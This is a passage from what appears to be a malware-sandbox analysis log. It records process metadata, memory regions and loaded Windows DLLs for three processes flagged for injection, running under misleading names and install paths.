"gmailnotifierpro.exe" filename = "c:\\program files (x86)\\windows photo viewer\\gmailnotifierpro.exe" page_root = "0x613a4000" os_pid = "0x11a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\gmailnotifierpro.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Photo Viewer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4763 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4764 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4765 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4766 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4767 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4768 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4769 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4770 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4771 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4772 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4773 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4774 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4775 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4776 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 4777 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 4778 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 4779 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 4780 start_va = 0x9d0000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 4781 start_va = 0xb60000 end_va = 0xc1bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 4782 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 4783 start_va = 0xd10000 end_va = 0xd26fff monitored = 0 entry_point = 0xd114a1 region_type = mapped_file name = "gmailnotifierpro.exe" filename = "\\Program Files (x86)\\Windows Photo Viewer\\gmailnotifierpro.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\gmailnotifierpro.exe") Region: id = 4784 start_va = 0xd30000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 4785 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4786 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4787 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4788 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4789 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4790 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4791 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4792 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4793 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4794 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4795 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4796 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4797 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4798 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4799 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4800 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4801 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4802 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4803 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4804 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4805 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4806 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4807 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4808 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4809 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4810 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 231 os_tid = 0x12a8 Thread: id = 232 os_tid = 0x11a8 Process: id = "55" image_name = "pidgin.exe" filename = "c:\\program files\\msbuild\\pidgin.exe" page_root = "0x7b386000" os_pid = "0x117c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\MSBuild\\pidgin.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4091 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4092 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4093 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4094 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4095 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4096 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4097 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4098 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4099 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4100 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4101 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4102 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4103 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4104 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4105 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 4106 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 4107 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 4108 start_va = 0x960000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 4109 start_va = 0xaf0000 end_va = 0xbabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 4110 start_va = 0xc80000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 4111 start_va = 0x10c0000 end_va = 0x10d6fff monitored = 0 entry_point = 0x10c14a1 region_type = mapped_file name = "pidgin.exe" filename = "\\Program Files\\MSBuild\\pidgin.exe" (normalized: "c:\\program files\\msbuild\\pidgin.exe") Region: id = 4112 start_va = 0x10e0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010e0000" filename = "" Region: id = 4113 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4114 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4115 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4116 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4117 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4118 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4119 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4120 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4121 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4122 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4123 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4124 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4125 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4126 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4127 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4128 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4129 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4130 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4131 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4132 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4133 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4134 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4135 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4136 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4137 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4138 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 233 os_tid = 0x1248 Thread: id = 234 os_tid = 0x1180 Process: id = "56" image_name = "outlook.exe" filename = "c:\\program files (x86)\\windows multimedia platform\\outlook.exe" page_root = "0x77eee000" os_pid = "0x11dc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\outlook.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Multimedia Platform\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4139 start_va = 0x10000 end_va = 0x26fff monitored = 0 entry_point = 0x114a1 region_type = mapped_file name = "outlook.exe" filename = "\\Program Files (x86)\\Windows Multimedia Platform\\outlook.exe" (normalized: "c:\\program files (x86)\\windows multimedia platform\\outlook.exe") Region: id = 4140 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4141 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 4142 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4143 start_va = 0x60000 end_va = 0x74fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 4144 start_va = 0x80000 end_va = 0xbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 4145 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 4146 start_va = 0x1c0000 end_va = 0x1c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 4147 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4148 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4149 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4150 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4151 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4152 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4153 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4154 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 4155 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4156 start_va = 0x5d0000 end_va = 0x68dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4157 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 4158 start_va = 0x920000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 4159 start_va = 0xab0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 4160 start_va = 0x1eb0000 end_va = 0x1f6bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001eb0000" filename = "" Region: id = 4161 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4162 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4163 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4164 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4165 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4166 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4167 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4168 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4169 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4170 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4171 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4172 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4173 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4174 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4175 start_va = 0x75740000 end_va = 